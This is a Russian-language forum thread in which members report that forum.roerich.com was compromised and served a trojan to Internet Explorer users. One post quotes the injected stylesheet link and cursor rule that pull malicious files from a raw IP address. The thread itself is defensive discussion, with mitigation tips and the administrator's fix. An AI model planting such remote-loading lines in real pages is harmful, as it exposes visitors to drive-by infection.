Сайт forum.roerich.com инфицирован

[Dron.ru]

Вчера в очередной раз зашёл на forum.roerich.com и подцепил html вирус m00.exe. Уязвимы почти все версии эксплорера (у меня v6.0.26). Блокировать вирус можно любой прогой вырезающей рекламу по ключевым словам (добавьте ключевое слово my.css).

Рекомендую администрации сайта обратить внимание на строчку html кода форума href="http://66.246.224.19/my.css" type="text/css" по которой подгружается троян body { cursor: url('http://66.246.224.19/my.ani');

[Кайвасату]

Цитата:

Сообщение от Dron.ru

Вчера в очередной раз зашёл на forum.roerich.com и подцепил html вирус m00.exe. Уязвимы почти все версии эксплорера (у меня v6.0.26). Блокировать вирус можно любой прогой вырезающей рекламу по ключевым словам (добавьте ключевое слово my.css).

Рекомендую администрации сайта обратить внимание на строчку html кода форума href="http://66.246.224.19/my.css" type="text/css" по которой подгружается троян body { cursor: url('http://66.246.224.19/my.ani');

С форумом действительно что-то не так, уже второй день он у меня отображается какими-то другими цветами

[Dron.ru]

Отображается другими цветами именно потому что все цвета и оформление прописываются в файле стилей (.css), ссылку на который вирус заменил на ссылку на инфицированный файл css подгружающийся с левого айпишника. В этом файле css вместо цветовых констант прописан код, который приводит к переполнению буфера эксплорера и установке на комп юзера трояна.

Чтобы устранить проблему достаточно на сервере заменить в php скриптах ссылку с инфицированного css на css который был до этого. Ну и надо поймать червя за хвост в автозагрузке дабы он снова не переписал php код

[Свет]

Если администратор не поторопится, то форум потеряет много участников

[Aёй Мах-Мах]

вы это... поменьше про всякие уязвимости в форумах пишите...
есть люди, которе намеренно ищут подобную информацию в практических целях, а при поиске случайно натыкаются на ваш форум...
вы сами их притягиваете.

[Свет]

Во множестве тем начальное сообщение отсутствует. Сложность открыть профиль с дальнейшим процессом и т.д.
Будут ли информировать участников о предринимающих действиях со стороны администратора, ведь данные имеются?
Если продлиться ситуация невединия, кто-то не может войти, кто-то не может нормально просмотреть, то по разным условиям разбегутся.
Может нужно сделать каникулы и отпуска , но для этого всё же следует оповестить участников, чтобы отдых не затянулся на долго

[rodnoy]

Мой Norton Antivirus выловил трояна "Trojan.Moo".
Игорь - необходимо СРОЧНО форум полечить

САРВА МАНГАЛАМ!

[Beholder]

Лишний повод воспользоваться альтернативными браузерами. Например, Mozilla Firefox.

[Igor Prolis]

Форум сейчас вылечил. Перевожу его на последнюю версию, где не должно быть подобных уязвимостей.

[Свет]

Игорь, спасибо

[Sagittari]

Все-таки целесообразно было бы предупредить о троянских конях, это бы оценили форумчане, которые сейчас чистят машины, а некоторые и не знают, что с ними сейчас происходит. Сам долго не мог понять в чем дело, пока не обновил антивирусник.
Надо сделать выводы из сложившейся ситуации на будущее.
С Уважением, Sagittari

[Кайвасату]

Цитата:

Сообщение от Igor Prolis

Форум сейчас вылечил. Перевожу его на последнюю версию, где не должно быть подобных уязвимостей.

Советую по этому поводу http://myphpbb.com.ru/
Сам недавно обновлял с 2.0.11 до 2.0.13 по тамошним FAQ. Если изменять ручками, то останутся все уже добавленные прибамбасы.

[Kay Ziatz]

http://net.compulenta.ru/52210/

Можно сказать и ширше: в течение более 10 лет я стараюсь как можно меньше использовать любые программы Microsoft и в результате за всё это время не страдал от вирусов.